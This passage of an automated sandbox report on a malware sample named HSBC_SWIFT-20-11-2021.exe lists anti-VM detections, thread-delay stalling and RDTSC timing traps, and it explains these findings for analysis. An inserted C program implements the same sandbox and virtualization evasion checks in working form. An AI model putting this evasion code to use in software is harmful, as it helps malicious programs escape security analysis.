          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msdt.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
          Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX (18 identical entries collapsed)

          Malware Analysis System Evasion:

          Yara detected AntiVM3
          Source: Yara match, File source: 0.2.HSBC_SWIFT-20-11-2021.exe.3028f8c.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 00000000.00000002.384226199.0000000002FC1000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000000.00000002.384521083.000000000314D000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: Process Memory Space: HSBC_SWIFT-20-11-2021.exe PID: 7156, type: MEMORYSTR
          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
          Source: HSBC_SWIFT-20-11-2021.exe, 00000000.00000002.384521083.000000000314D000.00000004.00000001.sdmp, HSBC_SWIFT-20-11-2021.exe, 00000000.00000002.384226199.0000000002FC1000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
          Source: HSBC_SWIFT-20-11-2021.exe, 00000000.00000002.384521083.000000000314D000.00000004.00000001.sdmp, HSBC_SWIFT-20-11-2021.exe, 00000000.00000002.384226199.0000000002FC1000.00000004.00000001.sdmp Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe RDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe RDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\msdt.exe RDTSC instruction interceptor: First address: 0000000000E38604 second address: 0000000000E3860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\msdt.exe RDTSC instruction interceptor: First address: 0000000000E3898E second address: 0000000000E38994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
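          The two signatures above (the SBIEDLL.DLL and KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME strings, and the back-to-back rdtsc reads) describe checks that can be reproduced directly. The C program below is an added example written for this page; it is not code recovered from the sample and not part of the Joe Sandbox report. The 1000-cycle threshold, the round count and the helper names are assumptions. On x86 it performs the same two-read timing measurement the interceptor flagged (the sample's "xor ecx, ecx / add ecx, eax" between the reads only parks the first low dword in ecx); the Sandboxie and Wine probes compile to real checks only on Windows and report 0 elsewhere.

```c
/*
 * Added example: RDTSC timing check plus the module/export probes behind the
 * SBIEDLL.DLL and wine_get_unix_file_name strings. Threshold, round count and
 * names are assumptions, not values recovered from the sample.
 */
#include <stdint.h>
#include <stdio.h>

#if defined(_MSC_VER)
#  include <intrin.h>
#  define READ_TSC() __rdtsc()
#elif defined(__x86_64__) || defined(__i386__)
#  include <x86intrin.h>
#  define READ_TSC() __rdtsc()
#else
/* Non-x86 fallback so the file still builds: monotonic clock in nanoseconds. */
#  include <time.h>
static uint64_t read_tsc_fallback(void) {
    struct timespec ts;
    clock_gettime(CLOCK_MONOTONIC, &ts);
    return (uint64_t)ts.tv_sec * 1000000000ULL + (uint64_t)ts.tv_nsec;
}
#  define READ_TSC() read_tsc_fallback()
#endif

#ifdef _WIN32
#  include <windows.h>
#endif

/* Two back-to-back timestamp reads, as in the "rdtsc / xor ecx,ecx /
 * add ecx,eax / rdtsc" sequence in the report. Nothing of substance runs
 * between them, so on bare metal the delta is a few dozen cycles. A
 * hypervisor that traps RDTSC, or a sandbox that hooks or single-steps it,
 * inflates the gap by orders of magnitude. */
static uint64_t tsc_pair_delta(void) {
    uint64_t t0 = READ_TSC();
    uint64_t t1 = READ_TSC();
    return t1 - t0;
}

/* Minimum over several rounds: a single large delta can be an interrupt or
 * a context switch, a consistently large minimum cannot. */
uint64_t min_tsc_delta(int rounds) {
    uint64_t best = UINT64_MAX;
    for (int i = 0; i < rounds; i++) {
        uint64_t d = tsc_pair_delta();
        if (d < best) best = d;
    }
    return best;
}

/* Decision separated from measurement so it can be tested with known input.
 * The threshold is an assumption (around 1000 cycles is a common heuristic);
 * the sample's actual cut-off is not in the report. */
int timing_looks_instrumented(uint64_t min_delta, uint64_t threshold) {
    return min_delta > threshold;
}

/* Sandboxie injects SbieDll.dll into every sandboxed process, and Wine's
 * kernel32 exports wine_get_unix_file_name while a real kernel32 does not.
 * Both probes only mean anything on Windows; elsewhere they report 0. */
int sandboxie_dll_loaded(void) {
#ifdef _WIN32
    return GetModuleHandleA("SbieDll.dll") != NULL;
#else
    return 0;
#endif
}

int wine_export_present(void) {
#ifdef _WIN32
    HMODULE k32 = GetModuleHandleA("kernel32.dll");
    return k32 != NULL && GetProcAddress(k32, "wine_get_unix_file_name") != NULL;
#else
    return 0;
#endif
}

int main(void) {
    uint64_t d = min_tsc_delta(1000);
    printf("min rdtsc delta over 1000 rounds: %llu\n", (unsigned long long)d);
    printf("timing looks instrumented: %d\n", timing_looks_instrumented(d, 1000));
    printf("SbieDll.dll loaded: %d\n", sandboxie_dll_loaded());
    printf("wine_get_unix_file_name exported: %d\n", wine_export_present());
    return 0;
}
```

          Build it with any C99 compiler and run it once on bare metal and once inside the analysis VM. The minimum delta over many rounds, rather than any single reading, is what separates the two environments, which is why an interceptor that returns plausible but slow values is still visible to this kind of check.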
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128 Thread sleep time: -8301034833169293s >= -30000s
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128 Thread sleep time: -240000s >= -30000s
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 1724 Thread sleep count: 4958 > 30
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128 Thread sleep time: -239857s >= -30000s
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 1724 Thread sleep count: 3383 > 30
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128 Thread sleep time: -239734s >= -30000s
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 7160 Thread sleep time: -31504s >= -30000s
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128 Thread sleep time: -239624s >= -30000s
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128 Thread sleep time: -239515s >= -30000s
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128 Thread sleep time: -239404s >= -30000s
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128 Thread sleep time: -239295s >= -30000s
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128 Thread sleep time: -239187s >= -30000s
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128 Thread sleep time: -239077s >= -30000s
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128 Thread sleep time: -238952s >= -30000s
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128 Thread sleep time: -238827s >= -30000s
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128 Thread sleep time: -238703s >= -30000s
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128 Thread sleep time: -238593s >= -30000s
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128 Thread sleep time: -238484s >= -30000s
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128 Thread sleep time: -238374s >= -30000s
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128 Thread sleep time: -238250s >= -30000s
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128 Thread sleep time: -238139s >= -30000s
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128 Thread sleep time: -238031s >= -30000s
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128 Thread sleep time: -237921s >= -30000s
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128 Thread sleep time: -237811s >= -30000s
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128 Thread sleep time: -237703s >= -30000s
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128 Thread sleep time: -237593s >= -30000s
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128 Thread sleep time: -237484s >= -30000s
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128 Thread sleep time: -237374s >= -30000s
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128 Thread sleep time: -237265s >= -30000s
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128 Thread sleep time: -237156s >= -30000s
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128 Thread sleep time: -237046s >= -30000s
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128 Thread sleep time: -236937s >= -30000s
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128 Thread sleep time: -236827s >= -30000s
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128 Thread sleep time: -236718s >= -30000s
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128 Thread sleep time: -236608s >= -30000s
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128 Thread sleep time: -236498s >= -30000s
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128 Thread sleep time: -236389s >= -30000s
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128 Thread sleep time: -236280s >= -30000s
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128 Thread sleep time: -236168s >= -30000s
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128 Thread sleep time: -236062s >= -30000s
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128 Thread sleep time: -235952s >= -30000s
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128 Thread sleep time: -235843s >= -30000s
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128 Thread sleep time: -235734s >= -30000s
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128 Thread sleep time: -235624s >= -30000s
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128 Thread sleep time: -235515s >= -30000s
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128 Thread sleep time: -235405s >= -30000s
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128 Thread sleep time: -235296s >= -30000s
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128 Thread sleep time: -235124s >= -30000s
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128 Thread sleep time: -235015s >= -30000s
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128 Thread sleep time: -234905s >= -30000s
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128 Thread sleep time: -234791s >= -30000s
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128 Thread sleep time: -234664s >= -30000s
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128 Thread sleep time: -234546s >= -30000s
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128 Thread sleep time: -234406s >= -30000s
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128 Thread sleep time: -234295s >= -30000s
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128 Thread sleep time: -234156s >= -30000s
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128 Thread sleep time: -233977s >= -30000s
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128 Thread sleep time: -233856s >= -30000s
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128 Thread sleep time: -233702s >= -30000s
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128 Thread sleep time: -233590s >= -30000s
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128 Thread sleep time: -233478s >= -30000s
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128 Thread sleep time: -232547s >= -30000s
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128 Thread sleep time: -231469s >= -30000s
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128 Thread sleep time: -231347s >= -30000s
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128 Thread sleep time: -231203s >= -30000s
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128 Thread sleep time: -231052s >= -30000s
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128 Thread sleep time: -230932s >= -30000s
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128 Thread sleep time: -230801s >= -30000s
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128 Thread sleep time: -230640s >= -30000s
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128 Thread sleep time: -230512s >= -30000s
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128 Thread sleep time: -230405s >= -30000s
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128 Thread sleep time: -230296s >= -30000s
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128 Thread sleep time: -230187s >= -30000s
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128 Thread sleep time: -230064s >= -30000s
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128 Thread sleep time: -229906s >= -30000s
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128 Thread sleep time: -229703s >= -30000s
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128 Thread sleep time: -229250s >= -30000s
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128 Thread sleep time: -229140s >= -30000s
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128 Thread sleep time: -229030s >= -30000s
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128 Thread sleep time: -228656s >= -30000s
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128 Thread sleep time: -223547s >= -30000s
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128 Thread sleep time: -223184s >= -30000s
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe TID: 5128 Thread sleep time: -223075s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5296 Thread sleep time: -8301034833169293s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4540 Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4248 Thread sleep count: 5369 > 30
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5504 Thread sleep time: -4611686018427385s >= -30000s
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6416 Thread sleep count: 697 > 30
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6004 Thread sleep time: -922337203685477s >= -30000s
          Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
          Source: C:\Windows\explorer.exe Last function: Thread delayed
          Source: C:\Windows\SysWOW64\msdt.exe Last function: Thread delayed
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe Code function: 8_2_004088C0 rdtsc 8_2_004088C0
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe Thread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe Thread delayed: delay time: 240000
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe Thread delayed: delay time: 239857
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe Thread delayed: delay time: 239734
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe Thread delayed: delay time: 239624
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe Thread delayed: delay time: 239515
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe Thread delayed: delay time: 239404
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe Thread delayed: delay time: 239295
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe Thread delayed: delay time: 239187
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe Thread delayed: delay time: 239077
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe Thread delayed: delay time: 238952
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe Thread delayed: delay time: 238827
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe Thread delayed: delay time: 238703
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe Thread delayed: delay time: 238593
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe Thread delayed: delay time: 238484
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe Thread delayed: delay time: 238374
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe Thread delayed: delay time: 238250
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe Thread delayed: delay time: 238139
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe Thread delayed: delay time: 238031
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe Thread delayed: delay time: 237921
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe Thread delayed: delay time: 237811
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe Thread delayed: delay time: 237703
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe Thread delayed: delay time: 237593
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe Thread delayed: delay time: 237484
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe Thread delayed: delay time: 237374
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe Thread delayed: delay time: 237265
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe Thread delayed: delay time: 237156
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe Thread delayed: delay time: 237046
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe Thread delayed: delay time: 236937
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe Thread delayed: delay time: 236827
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe Thread delayed: delay time: 236718
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe Thread delayed: delay time: 236608
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe Thread delayed: delay time: 236498
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe Thread delayed: delay time: 236389
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe Thread delayed: delay time: 236280
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe Thread delayed: delay time: 236168
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe Thread delayed: delay time: 236062
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe Thread delayed: delay time: 235952
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe Thread delayed: delay time: 235843
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe Thread delayed: delay time: 235734
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe Thread delayed: delay time: 235624
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe Thread delayed: delay time: 235515
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe Thread delayed: delay time: 235405
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe Thread delayed: delay time: 235296
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe Thread delayed: delay time: 235124
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe Thread delayed: delay time: 235015
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe Thread delayed: delay time: 234905
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe Thread delayed: delay time: 234791
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe Thread delayed: delay time: 234664
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe Thread delayed: delay time: 234546
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe Thread delayed: delay time: 234406
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe Thread delayed: delay time: 234295
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe Thread delayed: delay time: 234156
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe Thread delayed: delay time: 233977
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe Thread delayed: delay time: 233856
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe Thread delayed: delay time: 233702
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe Thread delayed: delay time: 233590
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe Thread delayed: delay time: 233478
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe Thread delayed: delay time: 232547
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe Thread delayed: delay time: 231469
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe Thread delayed: delay time: 231347
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe Thread delayed: delay time: 231203
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe Thread delayed: delay time: 231052
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe Thread delayed: delay time: 230932
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe Thread delayed: delay time: 230801
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe Thread delayed: delay time: 230640
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe Thread delayed: delay time: 230512
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe Thread delayed: delay time: 230405
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe Thread delayed: delay time: 230296
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe Thread delayed: delay time: 230187
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe Thread delayed: delay time: 230064
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe Thread delayed: delay time: 229906
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe Thread delayed: delay time: 229703
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe Thread delayed: delay time: 229250
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe Thread delayed: delay time: 229140
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe Thread delayed: delay time: 229030
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe Thread delayed: delay time: 228656
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe Thread delayed: delay time: 223547
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe Thread delayed: delay time: 223184
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe Thread delayed: delay time: 223075
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe Window / User API: threadDelayed 4958
          Source: C:\Users\user\Desktop\HSBC_SWIFT-20-11-2021.exe Window / User API: threadDelayed 3383
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5331
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 570
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5369
